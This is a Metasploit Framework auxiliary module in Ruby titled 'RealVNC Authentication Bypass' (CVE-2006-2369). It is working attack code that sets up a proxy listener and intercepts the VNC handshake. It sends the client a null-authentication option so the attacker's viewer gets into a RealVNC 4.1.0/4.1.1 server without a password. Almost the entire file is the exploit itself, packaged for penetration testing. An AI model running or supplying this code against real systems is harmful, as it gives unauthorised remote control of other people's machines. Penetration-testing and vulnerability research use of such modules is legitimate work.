##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'RealVNC Authentication Bypass',
'Description' => %q{
This module exploits an Authentication Bypass Vulnerability
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
listener on LPORT and proxies to the target server
The AUTOVNC option requires that vncviewer be installed on
the attacking machine. This option should be disabled for Pro
},
'Author' =>
[
'hdm', #original msf2 module
'TheLightCosine <thelightcosine[at]gmail.com>'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13641 $',
'References' =>
[
['BID', '17978'],
['OSVDB', '25479'],
['URL', 'http://secunia.com/advisories/20107/'],
['CVE', 'CVE-2006-2369'],
],
'DisclosureDate' => 'May 15 2006'))
register_options(
[
OptAddress.new('RHOST', [true, 'The Target Host']),
OptPort.new('RPORT', [true, "The port the target VNC Server is listening on", 5900 ]),
OptPort.new('LPORT', [true, "The port the local VNC Proxy should listen on", 5900 ]),
OptBool.new('AUTOVNC', [true, "Automatically Launch vncviewer from this host", true])
], self.class)
end
def run
#starts up the Listener Server
print_status("starting listener")
listener = Rex::Socket::TcpServer.create(
'LocalHost' => '0.0.0.0',
'LocalPort' => datastore['LPORT'],
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
)
#If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine
#targetting the proxy listener.
if (datastore['AUTOVNC'])
unless (check_vncviewer())
print_error("vncviewer does not appear to be installed, exiting!!!")
return nil
end
print_status("Spawning viewer thread")
view = framework.threads.spawn("VncViewerWrapper", false) {
system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
}
end
#Establishes the connection between the viewier and the remote server
client = listener.accept
add_socket(client)
s = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Timeout' => 1
)
add_socket(s)
serverhello = s.gets
unless serverhello.include? "RFB 003.008"
print_error("The VNCServer is not vulnerable")
return
end
#MitM attack on the VNC Authentication Process
client.puts(serverhello)
clienthello = client.gets
s.puts(clienthello)
authmethods = s.recv(2)
print_status("Auth Methods Recieved. Sending Null Authentication Option to Client")
client.write("\x01\x01")
client.recv(1)
s.write("\x01")
s.recv(4)
client.write("\x00\x00\x00\x00")
#handles remaining proxy operations between the two sockets
closed = false
while(closed == false)
sockets =[]
sockets << client
sockets << s
selected = select(sockets,nil,nil,0)
#print_status ("Selected: #{selected.inspect}")
unless selected.nil?
if selected[0].include?(client)
#print_status("Transfering from client to server")
begin
data = client.sysread(8192)
if data.nil?
print_error("Client Closed Connection")
closed = true
else
s.write(data)
end
rescue
print_error("Client Closed Connection")
closed = true
end
end
if selected[0].include?(s)
#print_status("Transfering from server to client")
begin
data = s.sysread(8192)
if data.nil?
print_error("Server Closed Connection")
closed = true
else
client.write(data)
end
rescue
closed = true
end
end
end
end
#Garbage Collection
s.close
client.close
print_status("Listener Closed")
if (datastore['AUTOVNC'])
view.kill
print_status("Viewer Closed")
end
end
def check_vncviewer
vnc =
Rex::FileUtils::find_full_path('vncviewer') ||
Rex::FileUtils::find_full_path('vncviewer.exe')
if (vnc)
return true
else
return false
end
end
end